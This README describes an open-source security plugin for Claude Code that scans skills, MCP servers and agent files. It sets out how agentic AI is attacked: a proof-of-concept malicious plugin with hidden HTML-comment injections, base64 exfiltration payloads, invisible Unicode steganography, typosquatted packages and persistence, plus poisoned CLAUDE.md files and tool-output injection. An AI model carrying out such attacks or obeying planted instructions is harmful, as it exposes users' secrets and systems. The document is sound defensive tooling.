LLM Security Plugin for Claude Code

Automated defense and advisory analysis for the agentic AI attack surface.

Built for my own Claude Code workflow and shared openly for anyone who finds it useful. This is a solo project — bug reports and feature requests are welcome, but pull requests are not accepted.

A Claude Code plugin that provides security scanning, auditing, and threat modeling for agentic AI projects. Built on OWASP LLM Top 10 (2025), OWASP Agentic AI Top 10, and the AI Agent Traps taxonomy (Google DeepMind, 2025), with threat intelligence from ToxicSkills, ClawHavoc, MCPTox, Pillar Security, Invariant Labs, and Operant AI research.



What Is This?

Claude Code plugins, MCP servers, and agentic workflows introduce attack surfaces that traditional security tools don't cover: prompt injection, tool poisoning, secret exfiltration through tool outputs, supply chain attacks via malicious skills, and excessive agency.

This plugin provides three layers of protection:

  • Automated enforcement — 9 hooks that block dangerous operations in real time (prompt injection in user input, secrets in code, writes to sensitive paths, destructive shell commands, supply chain guardrails, suspicious tool output, runtime trifecta detection, transcript scanning before context compaction, update notifications)
  • Deterministic scanning — 22 Node.js scanners (10 orchestrated + 12 standalone) that perform byte-level analysis LLMs cannot: Shannon entropy, Unicode codepoints, Levenshtein distance for typosquatting, source-to-sink taint flow, DNS resolution, git history forensics, toxic flow analysis, memory poisoning, live MCP inspection, AI-BOM generation, attack simulation, IDE extension prescan
  • Advisory analysis — 19 commands that scan, audit, and model threats with structured reports, letter grades, and actionable remediation plans

Key capabilities:

  • Supply chain gate — scan any plugin, MCP server, or agent file before installation with ALLOW/WARNING/BLOCK verdicts
  • Full project audit — evaluate 16 security categories with A-F grading and prioritized action items
  • Plugin trust assessment — dedicated plugin audit with Install/Review/Do Not Install verdict
  • MCP server audit — focused analysis of all installed MCP configurations with trust scoring
  • Threat modeling — interactive STRIDE × MAESTRO 7-layer session with risk matrix
  • Pre-deployment checklist — 10 automated + 3 manual checks before going to production
  • Automated remediation — scan-and-fix pipeline with 3-tier approach (auto/semi-auto/manual)
  • Continuous monitoring — recurring diff scanning via /security watch (uses built-in /loop) or system cron via watch-cron.mjs
  • Quick posture check — 30-second scorecard showing your security baseline (16 categories)

Tip

Start with /security posture for a 30-second baseline, then /security audit for the full picture.


The Extension Security Problem

Claude Code's extensibility model — skills, MCP servers, plugins, hooks — creates an attack surface that mirrors the npm/PyPI supply chain problem, but with a critical difference: extensions run with LLM agency. A malicious plugin doesn't just execute code in a sandbox; it can instruct an AI agent to read your SSH keys, exfiltrate environment variables, install persistence mechanisms, and modify its own configuration — all while appearing to be a helpful "Project Health Dashboard."

This is not theoretical. The ToxicSkills research (Xi'an Jiaotong, 2025) and ClawHavoc campaign (Repello AI, 2025) documented real attack patterns against agentic AI systems. The OWASP LLM Top 10 and OWASP Agentic AI Top 10 now formally categorize these threats.

We built a proof-of-concept — a single plugin called "Project Health Dashboard" that looks legitimate but embeds attacks across every threat category. When scanned with this plugin's combined LLM + deterministic analysis, it produced 85 findings: prompt injection via HTML comments, environment exfiltration via base64-encoded payloads, Unicode steganography invisible to human review, 6 typosquatting packages, 6 source-to-sink taint flows, persistence via crontab and LaunchAgents, and more. Verdict: BLOCK 100/100.

A human reviewing the plugin's README and SKILL.md would likely miss most of these. The Unicode Tag steganography is literally invisible. The base64 payload looks like a configuration block. The typosquatting packages are one character off from the real ones.
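To make the "literally invisible" point concrete, here is a minimal sketch of codepoint-level detection. It is not the plugin's unicode-scanner.mjs; the function names `findInvisibleCodepoints` and `decodeTagPayload` and the exact ranges are assumptions chosen for illustration.

```javascript
// Hypothetical ranges for illustration; the real scanner's list may differ.
const SUSPICIOUS_RANGES = [
  { kind: "zero-width", from: 0x200b, to: 0x200d },
  { kind: "bidi-override", from: 0x202a, to: 0x202e },
  { kind: "unicode-tag", from: 0xe0000, to: 0xe007f },
];

// Walk the string by code point and report every invisible character.
function findInvisibleCodepoints(text) {
  const findings = [];
  let offset = 0; // UTF-16 offset into the original string
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    const range = SUSPICIOUS_RANGES.find((r) => cp >= r.from && cp <= r.to);
    if (range) {
      const hex = cp.toString(16).toUpperCase().padStart(4, "0");
      findings.push({ offset, codepoint: "U+" + hex, kind: range.kind });
    }
    offset += ch.length; // astral characters occupy two UTF-16 units
  }
  return findings;
}

// Unicode Tag characters mirror ASCII at an offset of 0xE0000,
// so a hidden payload can be recovered by subtracting that offset.
function decodeTagPayload(text) {
  let out = "";
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (cp >= 0xe0020 && cp <= 0xe007e) out += String.fromCharCode(cp - 0xe0000);
  }
  return out;
}
```

A string that renders as plain "ok" in an editor can carry an arbitrary hidden instruction this way, which is why a byte-level pass is needed in addition to human or LLM review.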

What organizations need:

  1. A pre-installation scan gate — automated analysis before any extension is installed (this plugin provides /security scan and /security plugin-audit)
  2. A trusted, curated marketplace — vetted extensions with security review as a prerequisite for listing
  3. Deterministic scanning — byte-level analysis for things LLMs cannot detect: Unicode codepoints, Shannon entropy, Levenshtein distance, source-to-sink taint flows
  4. Automated hooks — always-on primary defense blocking secrets in code, writes to sensitive paths, and destructive commands in real time

Important

Always scan repos remotely before cloning them. A poisoned CLAUDE.md injects instructions into the model context the moment you open a cloned repo — before any hooks can intervene. /security scan https://repo-url --deep analyzes everything safely via pre-extraction, without loading anything into your session. This is the primary defense against CLAUDE.md poisoning.


Quick Start

Prerequisites

  • Claude Code installed
  • Node.js (for automated hooks — .mjs scripts)

Important

If you use Opus with extended context (1M tokens): Subagents inherit the parent session's context limit but do not support extended context, causing API errors ("limit reached" or "extra usage required"). Fix: run /model Opus in your session before using any security commands. This resets the session to standard 200K context, which subagents handle correctly.

Installation

Add the marketplace and browse plugins with /plugin:

claude plugin marketplace add https://git.fromaitochitta.com/open/ktg-plugin-marketplace.git

Or enable directly in ~/.claude/settings.json:

{
  "enabledPlugins": {
    "llm-security@ktg-plugin-marketplace": true
  }
}

Note

Hooks activate immediately on installation. Secret detection, path guarding, and destructive command blocking start working without any commands.

First Scan

> /security posture

┌──────────────────────────────────────────────┐
│  Security Posture: 8/16  [B]  77%            │
│  ████████████████░░░░░░░░░░                  │
├──────────────────────────────────────────────┤
│  ✅ Deny-First Config                        │
│  ✅ Secrets Protection                        │
│  ✅ Path Guarding                             │
│  ⚠️  MCP Server Trust                         │
│  ✅ Destructive Command Blocking              │
│  ⚠️  Sandbox Config                           │
│  ⚠️  Human Review                             │
│  ✅ Skill/Plugin Sources                      │
│  ⚠️  Session Isolation                        │
│  ✅ Cognitive State Security                  │
│  ✅ Prompt Injection Hardening                │
│  ⚠️  Rule of Two                              │
│  ⚠️  Long-Horizon Monitoring                  │
│  ✅ EU AI Act                                 │
│  ⚠️  NIST AI RMF                              │
│  —  ISO 42001                                │
├──────────────────────────────────────────────┤
│  6 findings (1 high, 3 medium, 2 low)        │
└──────────────────────────────────────────────┘

Commands

Scanning & Assessment

Command Description
/security Overview of all commands and quick start guide
/security scan [path|url] Scan skills, MCP servers, directories, or GitHub repos for security issues
/security scan [path|url] --deep Enhanced scan: LLM agents + 10 deterministic scanners
/security deep-scan [path] Run 10 deterministic Node.js scanners directly (entropy, unicode, taint, deps, git, permissions, network, memory poisoning, supply chain recheck, toxic flow). Supports --fail-on <severity>, --compact, --format sarif, --output-file <path>
/security audit Full project security audit with A-F grading and remediation plan
/security plugin-audit [path|url] Dedicated plugin security audit with Install/Review/Do Not Install verdict (local or GitHub URL)
/security mcp-audit [--live] Focused audit of all installed MCP server configurations (add --live for runtime inspection)
/security mcp-inspect Connect to running MCP stdio servers and scan live tool descriptions
/security ide-scan [target|url] Scan installed VS Code (+ Cursor, Windsurf, VSCodium, code-server) / JetBrains extensions — OR fetch a remote VSIX from VS Code Marketplace, OpenVSX, or direct .vsix URL (v6.4.0). Typosquat, theme-with-code, sideload, broad activation, uninstall hooks, plus UNI/ENT/NET/TNT/MEM/SCR per extension. Offline by default
/security posture Quick security posture scorecard (16 categories incl. compliance)
/security diff [path] Compare scan against stored baseline — shows new/resolved/unchanged/moved findings
/security watch [path] [--interval 6h] Continuous monitoring — runs diff on a recurring interval via /loop
/security registry [scan|search] Skill signature registry — view stats, scan+register skills, search known fingerprints

Remediation

Command Description
/security clean [path] Scan and remediate findings — auto-fix, semi-auto confirm, manual report
/security clean [path] --dry-run Preview what would be fixed without modifying files
/security harden [path] Generate Grade A security config — settings.json, CLAUDE.md, .gitignore
/security harden [path] --apply Apply generated config with automatic backup

Threat Modeling & Planning

Command Description
/security threat-model Interactive STRIDE/MAESTRO threat modeling session (15-30 min)
/security red-team [--category] [--adaptive] Attack simulation — 64 scenarios across 12 categories test hook defenses. --adaptive for mutation-based evasion testing
/security pre-deploy Pre-deployment security checklist (10 automated + 3 manual checks)

Scan

/security scan is a supply chain gate. Point it at any local path or GitHub URL before installation. It spawns specialized agents sequentially to analyze:

  • Skills/agents: 7 threat categories (injection, exfiltration, privilege escalation, scope creep, hidden instructions, toolchain manipulation, persistence)
  • MCP servers: 5-phase analysis (tool descriptions, source code, dependencies, configuration, rug pull detection)

Remote repo support (v2.4+): Pass a GitHub URL directly — the plugin clones to a temp directory, scans, and cleans up. Use --branch <name> for non-default branches:

/security scan https://github.com/org/repo --branch dev --deep

Injection-safe remote scanning (v2.5+): Remote scans pre-extract structured evidence via content-extractor.mjs and strip injection patterns BEFORE LLM agents see the content. Agents analyze a JSON evidence package, never raw files from untrusted repos. [INJECTION-PATTERN-STRIPPED] markers are confirmed findings.
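The pre-extraction idea can be sketched as follows. This is an illustration only, not the contents of content-extractor.mjs: the two patterns, the `extractEvidence` name, and the shape of the returned object are assumptions. Only the marker string comes from the description above.

```javascript
// Marker string as documented above.
const MARKER = "[INJECTION-PATTERN-STRIPPED]";

// Hypothetical patterns; the real pattern set is not reproduced here.
const INJECTION_PATTERNS = [
  /<!--[\s\S]*?-->/g, // hidden HTML comments
  /ignore (all )?(previous|prior) instructions/gi, // direct override phrasing
];

// Turn one untrusted file into a JSON-serializable evidence record.
// The raw text never leaves this function unmodified.
function extractEvidence(path, rawContent) {
  let strippedCount = 0;
  let content = rawContent;
  for (const pattern of INJECTION_PATTERNS) {
    content = content.replace(pattern, () => {
      strippedCount += 1;
      return MARKER;
    });
  }
  return { path, content, strippedCount };
}
```

Because each replacement leaves a marker behind, a downstream agent can still report where an injection attempt was found without ever reading the attacker's wording.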

Sandboxed cloning (v5.1+): git clone can execute arbitrary code via .gitattributes filter/smudge drivers (CVE-2024-32002 and related). Remote clones are now hardened with defense-in-depth:

Layer 1 — Git config hardening (all platforms): 8 config flags neutralize known attack vectors:

| Flag | Mitigates |
| --- | --- |
| core.hooksPath=/dev/null | Git hooks executed during clone/checkout |
| core.symlinks=false | Symlink traversal out of temp directory |
| core.fsmonitor=false | Arbitrary command execution via fsmonitor |
| filter.lfs.{process,smudge,clean}= | Filter/smudge driver code execution (.gitattributes) |
| protocol.file.allow=never | Local file protocol traversal |
| transfer.fsckObjects=true | Malformed git objects |

Environment variables (GIT_CONFIG_NOSYSTEM=1, GIT_CONFIG_GLOBAL=/dev/null, GIT_ATTR_NOSYSTEM=1, GIT_TERMINAL_PROMPT=0) isolate from system/user git config and block interactive prompts.
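As a rough sketch of how Layer 1 could be assembled, the helper below builds the argument list and environment for a hardened clone from the flags and variables listed above. The function name `buildHardenedClone` and its return shape are hypothetical; the plugin's actual clone code is not shown in this document.

```javascript
// The eight flags from the table above (filter.lfs.* expanded to three).
const HARDENING_FLAGS = [
  "core.hooksPath=/dev/null",
  "core.symlinks=false",
  "core.fsmonitor=false",
  "filter.lfs.process=",
  "filter.lfs.smudge=",
  "filter.lfs.clean=",
  "protocol.file.allow=never",
  "transfer.fsckObjects=true",
];

// Environment variables that isolate git from system and user config.
const HARDENING_ENV = {
  GIT_CONFIG_NOSYSTEM: "1",
  GIT_CONFIG_GLOBAL: "/dev/null",
  GIT_ATTR_NOSYSTEM: "1",
  GIT_TERMINAL_PROMPT: "0",
};

// Build (but do not run) a hardened clone invocation.
function buildHardenedClone(url, targetDir, branch) {
  const args = [];
  for (const flag of HARDENING_FLAGS) args.push("-c", flag);
  args.push("clone");
  if (branch) args.push("--branch", branch);
  args.push("--", url, targetDir); // "--" stops option parsing on the URL
  return { command: "git", args, env: { ...HARDENING_ENV } };
}
```

The result can be handed to `child_process.spawn(command, args, { env })`, typically with the returned `env` merged over a minimal base environment so that `PATH` is still available.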

Layer 2 — OS-level filesystem sandbox (platform-dependent):

| Platform | Sandbox | How it works | Limitations |
| --- | --- | --- | --- |
| macOS | sandbox-exec | Restricts file writes to only the clone temp dir via Seatbelt profiles | Deprecated by Apple but still functional (no replacement exists) |
| Linux | bubblewrap (bwrap) | Read-only root bind mount + writable clone dir + namespace isolation | Requires bwrap package. Fails on Ubuntu 24.04+ without admin AppArmor config. Works on Fedora/Arch |
| Windows | None available | Git config hardening only (Layer 1) | See Windows guidance below |

The plugin probe-tests sandbox availability at runtime and falls back gracefully. When no OS sandbox is available, a WARN is logged and cloning proceeds with git config hardening only.

Additional protections: Post-clone size check (100MB max), UUID-unique evidence filenames (prevents race conditions), cleanup guarantee (temp files removed even on error).

Windows guidance: Windows has no CLI-level filesystem sandbox equivalent to sandbox-exec or bwrap. The alternatives either require additional software or admin privileges:

| Option | Isolation level | Requirements |
| --- | --- | --- |
| Windows Sandbox | Full VM (Hyper-V) | Windows Pro/Enterprise, Hyper-V enabled. GUI-oriented, not scriptable |
| Docker Desktop | Container | Requires Docker install. Best option for automated isolation |
| WSL2 | Linux VM | Requires WSL2 install. Once inside, bwrap is available (except Ubuntu 24.04+ caveat) |
| AppContainer | Process sandbox | Requires a native C++ helper binary, which is not practical to ship in a Node.js plugin |

Recommendation for Windows users: Run Claude Code inside WSL2 or Docker Desktop for full sandbox coverage. The git config hardening (Layer 1) provides baseline protection on all platforms and neutralizes all known .gitattributes attack vectors even without an OS sandbox.

Why not Node.js --permission? Node's permission model restricts fs module access within the Node process, but does not sandbox child processes like git which run as separate OS processes. It is therefore not useful for this use case.

Output: structured report with ALLOW / WARNING / BLOCK verdict, risk score (0-100), and findings sorted by severity.

Audit

/security audit is a comprehensive project review. It spawns up to 3 agents to evaluate 9 security categories:

  1. Secret management
  2. Permission model
  3. Input validation
  4. Output handling
  5. Supply chain
  6. Data protection
  7. Logging and monitoring
  8. Network security
  9. Agent autonomy controls

Output: A-F letter grade, risk matrix, and prioritized action items.

Plugin Audit

/security plugin-audit [path|url] is a dedicated trust assessment for Claude Code plugins. Point it at any local plugin directory or GitHub URL to get a comprehensive evaluation before installation. It analyzes:

  • Manifest metadata — name, version, author, auto_discover settings
  • Component inventory — commands, agents, hooks, skills with tool grants
  • Permission matrix — aggregated tool access across all components, flagging Bash, Write+Bash, and Task access
  • Hook safety — classifies hook behavior (block/warn/advisory), flags state-modifying or network-calling hooks
  • Content scan — spawns skill-scanner-agent for 7 threat categories

Output: structured report with Install / Review / Do Not Install trust verdict.

Clean

/security clean is a scan-and-remediate pipeline. It runs the full deterministic scanner suite, classifies each finding into one of three tiers, and acts accordingly:

  • Auto — Deterministic, safe fixes applied without confirmation (e.g., removing zero-width characters, BIDI overrides, Unicode Tag steganography, upgrading haiku models)
  • Semi-auto — Fixes generated by an LLM agent, presented for user confirmation before applying (e.g., homoglyph replacement, permission adjustments, dependency fixes)
  • Manual — Findings that require human judgment, included in the report but not auto-fixed (e.g., taint flow refactoring, architecture changes)

The remediation engine (auto-cleaner.mjs) performs 16 fix operations as pure functions (content → content) with atomic writes and post-fix validation. Use --dry-run to preview all proposed changes without modifying any files.
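The "pure function" design can be illustrated with one Auto-tier fix and a small runner. This is a sketch under assumptions, not the code in auto-cleaner.mjs: `stripInvisibleCharacters` and `applyFixes` are hypothetical names, and atomic writes and post-fix validation are left out.

```javascript
// One fix operation: content in, content out, no side effects.
// Removes zero-width characters, BIDI overrides, and Unicode Tag characters.
function stripInvisibleCharacters(content) {
  return content.replace(/[\u200B-\u200D\u202A-\u202E\u{E0000}-\u{E007F}]/gu, "");
}

// Run a list of fix functions in order and record which ones changed anything.
// Nothing is written to disk here, so the same call serves a dry run.
function applyFixes(content, fixes) {
  let current = content;
  const applied = [];
  for (const fix of fixes) {
    const next = fix(current);
    if (next !== current) applied.push(fix.name);
    current = next;
  }
  return { content: current, applied, changed: current !== content };
}
```

Keeping each fix free of file I/O means a dry run is the same call as a real run, minus the final write step, and each fix can be unit-tested on plain strings.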

Threat Model

/security threat-model runs a guided 15-30 minute interview session that maps your system through two frameworks:

  • STRIDE — Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege
  • MAESTRO 7-layer model — Foundation Models, Data/Knowledge, Agent Frameworks, Tool Integration, Agent Capabilities, Multi-Agent Systems, Ecosystem

Output: complete threat model document with prioritized threats, risk scores, and mitigation status.


Agent Architecture

The plugin delegates specialized work to 6 purpose-built agents. Each agent has focused threat detection capabilities and its own knowledge base routing.

| Agent | Role | Model | Spawned By | Tools |
| --- | --- | --- | --- | --- |
| skill-scanner-agent | 7 threat categories (injection, exfiltration, escalation, scope creep, hidden instructions, toolchain manipulation, persistence) | Opus | /security scan, /security audit, /security plugin-audit | Read, Glob, Grep |
| mcp-scanner-agent | 5-phase MCP analysis (tool descriptions, source code, dependencies, config, rug pull detection) | Opus | /security scan, /security mcp-audit | Read, Glob, Grep, Bash |
| posture-assessor-agent | 16-category assessment with PASS/PARTIAL/FAIL scoring and A-F grading | Opus | /security audit, /security posture | Read, Glob, Grep |
| threat-modeler-agent | Interactive STRIDE × MAESTRO 7-layer interview with 5-phase workflow | Opus | /security threat-model | Read, Glob, Grep, AskUserQuestion |
| deep-scan-synthesizer-agent | Interprets deterministic scanner JSON into human-readable report with executive summary and prioritized recommendations | Opus | /security deep-scan, /security scan --deep | Read, Glob, Grep |
| cleaner-agent | Generates semi-auto remediation proposals for findings requiring human judgment (read-only, returns JSON proposals) | Opus | /security clean | Read, Glob, Grep |

Scan Pipelines

For commands like /security audit, the plugin orchestrates multiple agents in parallel:

                  ┌──────────────┐
                  │  /security   │
                  │    audit     │
                  └──────┬───────┘
                         │
            ┌────────────┼────────────┐
            ▼            ▼            ▼
   ┌─────────────┐ ┌───────────┐ ┌──────────┐
   │    Skill    │ │    MCP    │ │ Posture  │
   │   Scanner   │ │  Scanner  │ │ Assessor │
   └──────┬──────┘ └─────┬─────┘ └────┬─────┘
          │              │             │
          └──────────────┼─────────────┘
                         ▼
                ┌────────────────┐
                │  Audit Report  │
                │  (A-F grade)   │
                └────────────────┘

For deep scans (/security scan --deep or /security deep-scan), deterministic scanners run in parallel followed by synthesis:

                  ┌──────────────┐
                  │  /security   │
                  │  scan --deep │
                  └──────┬───────┘
                         │
         ┌───────────────┼───────────────┐
         ▼               ▼               ▼
   ┌───────────┐  ┌────────────┐  ┌────────────┐
   │ LLM Skill │  │   10 Det.  │  │    MCP     │
   │  Scanner  │  │  Scanners  │  │  Scanner   │
   └─────┬─────┘  └──────┬─────┘  └──────┬─────┘
         │        UNI ENT PRM            │
         │        DEP TNT GIT            │
         │        NET MEM SCR TFA        │
         │               │               │
         │        ┌──────┴─────┐         │
         │        │ Synthesizer│         │
         │        │   Agent    │         │
         │        └──────┬─────┘         │
         └───────────────┼───────────────┘
                         ▼
                ┌────────────────┐
                │ Combined Report│
                │ (BLOCK/WARN/OK)│
                └────────────────┘

Deterministic Scanners

The scanner suite consists of 10 orchestrated and 12 standalone Node.js scripts that perform byte-level analysis an LLM cannot, with zero external dependencies. Orchestrated scanners run via node scanners/scan-orchestrator.mjs <target> or through /security deep-scan. These runs support --fail-on <severity>, --compact, --format sarif, and --output-file <path>.

Orchestrated (10)

| Scanner | Prefix | Detects | OWASP |
| --- | --- | --- | --- |
| unicode-scanner.mjs | UNI | Zero-width chars, Unicode Tag steganography, BIDI overrides, Cyrillic homoglyphs | LLM01 |
| entropy-scanner.mjs | ENT | High-entropy strings, base64/hex blobs, encoded payloads via Shannon entropy | LLM01, LLM03 |
| permission-mapper.mjs | PRM | Purpose-vs-tools mismatch, ghost hooks, haiku on sensitive agents, overprivileged components | LLM06 |
| dep-auditor.mjs | DEP | CVEs (npm/pip audit), typosquatting (Levenshtein distance), malicious install scripts, unpinned versions | LLM03 |
| taint-tracer.mjs | TNT | Source-to-sink data flow (process.env/req.body to eval/exec/fetch/writeFile), 3-pass analysis | LLM01, LLM02 |
| git-forensics.mjs | GIT | Force pushes, description drift, hook modifications, new outbound URLs, author changes | LLM03 |
| network-mapper.mjs | NET | Undisclosed URLs, suspicious domains (ngrok, webhook.site), IP-based URLs, DNS analysis | LLM02, LLM03 |
| memory-poisoning-scanner.mjs | MEM | Injection patterns, shell commands, credential paths, permission expansion, suspicious URLs, encoded payloads in CLAUDE.md/memory/rules files | LLM01, ASI02 |
| supply-chain-recheck.mjs | SCR | Re-audit installed deps from lockfiles against blocklists, OSV.dev batch API, typosquat detection | LLM03 |
| toxic-flow-analyzer.mjs | TFA | Lethal trifecta detection: untrusted input + sensitive data access + exfiltration sink. Cross-component correlation (runs last) | ASI01, ASI02, ASI05 |

Standalone (12)

| Scanner | Prefix | Purpose |
| --- | --- | --- |
| scan-orchestrator.mjs | - | Entry point: runs all 10 orchestrated scanners, outputs JSON |
| posture-scanner.mjs | PST | Deterministic posture assessment, 16 categories (incl. EU AI Act, NIST AI RMF, ISO 42001), <50ms |
| mcp-live-inspect.mjs | MCI | Live MCP server inspection via JSON-RPC 2.0 (tool injection, shadowing, URL/IP) |
| ide-extension-scanner.mjs | IDE | VS Code (+ Cursor, Windsurf, VSCodium, code-server) / JetBrains extension prescan: blocklist, theme-with-code, sideload, broad activation, typosquat, extension-pack expansion, dangerous uninstall hooks, then UNI/ENT/NET/TNT/MEM/SCR per extension |
| attack-simulator.mjs | - | Red-team harness: 64 scenarios, 12 categories, adaptive mutation mode |
| ai-bom-generator.mjs | BOM | CycloneDX 1.6 AI Bill of Materials |
| dashboard-aggregator.mjs | - | Cross-project security dashboard, machine-grade aggregation |
| reference-config-generator.mjs | - | Grade A config generation based on posture gaps |
| supply-chain-recheck-cli.mjs | - | CLI wrapper for SCR scanner |
| auto-cleaner.mjs | - | Remediation engine: 16 fix operations, atomic writes, post-fix validation |
| content-extractor.mjs | - | Pre-extracts evidence from untrusted repos, strips injection patterns |
| watch-cron.mjs | - | Cron wrapper: scans all targets in config, writes summary, exits with verdict code |

Why deterministic? LLMs are powerful at semantic analysis — understanding intent, detecting social engineering, assessing context. But they cannot reliably calculate Shannon entropy, measure Levenshtein distance between package names, trace taint flow across function boundaries, or detect individual Unicode codepoints. These scanners fill that gap.
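Shannon entropy is a good example of a calculation that is trivial in code and unreliable when estimated by a language model. The sketch below computes bits per character; the `looksHighEntropy` helper and its default threshold and minimum length are assumptions for illustration, not the values used by entropy-scanner.mjs.

```javascript
// Shannon entropy in bits per character: H = -sum(p * log2(p)).
function shannonEntropy(str) {
  const chars = Array.from(str); // iterate by code point
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) || 0) + 1);
  let entropy = 0;
  for (const count of counts.values()) {
    const p = count / chars.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Hypothetical flagging rule: long strings with near-random character mix.
function looksHighEntropy(str, threshold = 4.5, minLength = 20) {
  return str.length >= minLength && shannonEntropy(str) >= threshold;
}
```

A string of one repeated character scores 0, while a string in which four distinct characters appear equally often scores exactly 2 bits per character. English prose tends to sit well below random base64 or hex blobs, which is what makes a threshold useful.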

Shared library (scanners/lib/): severity classification, string utilities (entropy, Levenshtein, base64 detection), output formatting, file discovery, and YAML frontmatter parsing.
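As an example of the kind of string utility described here, the following is a standard two-row Levenshtein implementation with a small typosquat check on top. The `findTyposquatTarget` helper, its `maxDistance` default, and the sample package list are illustrative assumptions rather than the library's actual API.

```javascript
// Classic dynamic-programming edit distance, keeping only two rows in memory.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const curr = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      curr[j] = Math.min(
        prev[j] + 1, // deletion
        curr[j - 1] + 1, // insertion
        prev[j - 1] + cost // substitution
      );
    }
    prev = curr;
  }
  return prev[b.length];
}

// Flag a name that is close to, but not equal to, a well-known package.
function findTyposquatTarget(name, popularNames, maxDistance = 1) {
  if (popularNames.includes(name)) return null; // exact match is the real package
  for (const popular of popularNames) {
    const distance = levenshtein(name, popular);
    if (distance > 0 && distance <= maxDistance) return { target: popular, distance };
  }
  return null;
}
```

For instance, `findTyposquatTarget("expres", ["lodash", "express"])` reports `express` at distance 1, while the genuine `lodash` returns `null`.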


Automated Hooks

These hooks run on every operation — no commands needed. They activate the moment the plugin is installed.

| Hook | Event | What It Does |
| --- | --- | --- |
| Prompt injection scan | UserPromptSubmit | Blocks direct prompt injection (override instructions, spoofed headers, identity redefinition); warns on subtle manipulation signals. Decodes obfuscated payloads (unicode, hex, URL, base64) before matching. Configurable: LLM_SECURITY_INJECTION_MODE set to block, warn, or off (default: block) |
| Secret detection | Edit, Write | Blocks AWS keys, Azure tokens, GitHub PATs, npm tokens, PEM keys, database URLs, Bearer tokens, passwords (13 patterns) |
| Path guarding | Write | Blocks writes to .env, .ssh/, .aws/, .gnupg/, credentials files, hook scripts, /etc/, settings.json (8 path categories) |
| Destructive commands | Bash | Blocks rm -rf /, chmod 777, pipe-to-shell, fork bombs, eval injection (8 block rules + 6 warnings) |
| Supply chain guardrail | Bash | Blocks known-compromised npm/pip packages, typosquatting (Levenshtein), age-gated installs (<72h), OSV.dev CVE checks across 7 package managers |
| Output verification | All tools (post) | Advisory: scans ALL tool output for indirect prompt injection (LLM01). Bash-specific: also flags leaked secrets, unexpected URLs, oversized MCP responses. Skips short output (<100 chars) for performance |
| Session guard | All tools (post) | Advisory: monitors tool call sequences for lethal trifecta (untrusted input + sensitive data access + exfiltration sink). Sliding window of 20 calls, per-session JSONL state, warns when all 3 legs present (OWASP ASI01, ASI02) |
| Update check | UserPromptSubmit | Checks for newer plugin versions (max 1x/24h, cached). Disable: LLM_SECURITY_UPDATE_CHECK=off |

All hooks are Node.js (.mjs) for cross-platform compatibility (macOS, Linux, Windows).
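The session guard's sliding-window idea can be sketched in a few lines. This is an in-memory illustration only: the leg labels, the `createSessionGuard` name, and the shape of a recorded call are assumptions, and the per-session JSONL persistence is omitted.

```javascript
// The three legs of the lethal trifecta (labels are hypothetical).
const TRIFECTA_LEGS = ["untrusted_input", "sensitive_access", "exfil_sink"];

// Returns a function that records one tool call and reports whether
// all three legs are present within the most recent `windowSize` calls.
function createSessionGuard(windowSize = 20) {
  const recent = [];
  return function record(call) {
    recent.push(call);
    if (recent.length > windowSize) recent.shift(); // drop the oldest call
    const present = new Set(recent.flatMap((c) => c.legs));
    const missing = TRIFECTA_LEGS.filter((leg) => !present.has(leg));
    return { warn: missing.length === 0, missing };
  };
}
```

How a tool call is classified into legs (for example, treating a web fetch as untrusted input) is the hard part and is deliberately left to the caller in this sketch.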

Important

Prompt injection scan, secret detection, path guarding, destructive commands, and supply chain guardrail are blocking — they prevent the operation if a pattern matches. Output verification and session guard are advisory — they warn but do not block. Update check is informational — notifies when a newer version is available. Prompt injection blocking can be changed to warn-only (LLM_SECURITY_INJECTION_MODE=warn) or disabled (off) for security research or testing environments. Update check can be disabled with LLM_SECURITY_UPDATE_CHECK=off.
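The following sketch shows how decode-before-match and the three modes might fit together. It is not the hook's implementation: the single pattern, the `decodeLayers` and `checkPrompt` names, and the returned object are assumptions. Only the mode values (block, warn, off) and the LLM_SECURITY_INJECTION_MODE variable come from the text above.

```javascript
// One illustrative pattern; the real hook matches many more.
const OVERRIDE_PATTERN = /ignore (all )?(previous|prior) instructions/i;

// Produce decoded variants of the input so obfuscated payloads are also matched.
function decodeLayers(input) {
  const variants = new Set([input]);
  try {
    variants.add(decodeURIComponent(input)); // URL encoding
  } catch {
    // malformed percent-escape: keep the raw input only
  }
  // \xNN hex escapes
  variants.add(input.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
  // base64-looking tokens
  for (const token of input.match(/[A-Za-z0-9+/]{16,}={0,2}/g) || []) {
    variants.add(Buffer.from(token, "base64").toString("utf8"));
  }
  return [...variants];
}

// mode would normally come from process.env.LLM_SECURITY_INJECTION_MODE.
function checkPrompt(prompt, mode = "block") {
  if (mode === "off") return { action: "allow" };
  const hit = decodeLayers(prompt).some((variant) => OVERRIDE_PATTERN.test(variant));
  if (!hit) return { action: "allow" };
  return { action: mode === "warn" ? "warn" : "block" };
}
```

Decoding first matters because a pattern match on the raw text alone would miss the same phrase wrapped in base64 or percent-encoding.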


Knowledge Base

18 research-backed reference files grounding all analysis in published threat intelligence:

File Scope
owasp-llm-top10.md OWASP LLM Top 10 (2025) — attack vectors, detection signals, Claude Code mitigations
owasp-agentic-top10.md OWASP Agentic AI Top 10 (ASI01-ASI10) — agent-specific threats mapped to Claude Code
owasp-skills-top10.md OWASP Skills Top 10 (AST01-AST10) — skill-specific threats and mitigations
skill-threat-patterns.md 7 threat categories from ToxicSkills/ClawHavoc research with concrete detection patterns
mcp-threat-patterns.md 9 MCP threat categories from MCPTox/Pillar Security/Invariant Labs/Operant AI research
secrets-patterns.md 30+ regex patterns for secret detection across 10 provider categories
mitigation-matrix.md OWASP LLM Top 10 → Claude Code control mapping with verification checks and coverage scores
top-packages.json Top 200 npm + top 100 PyPI package names for typosquatting detection (Levenshtein baseline)
skill-registry.json Seed data for skill signature registry — known fingerprints and risk profiles
compliance-mapping.md EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS — article/control mappings to plugin capabilities
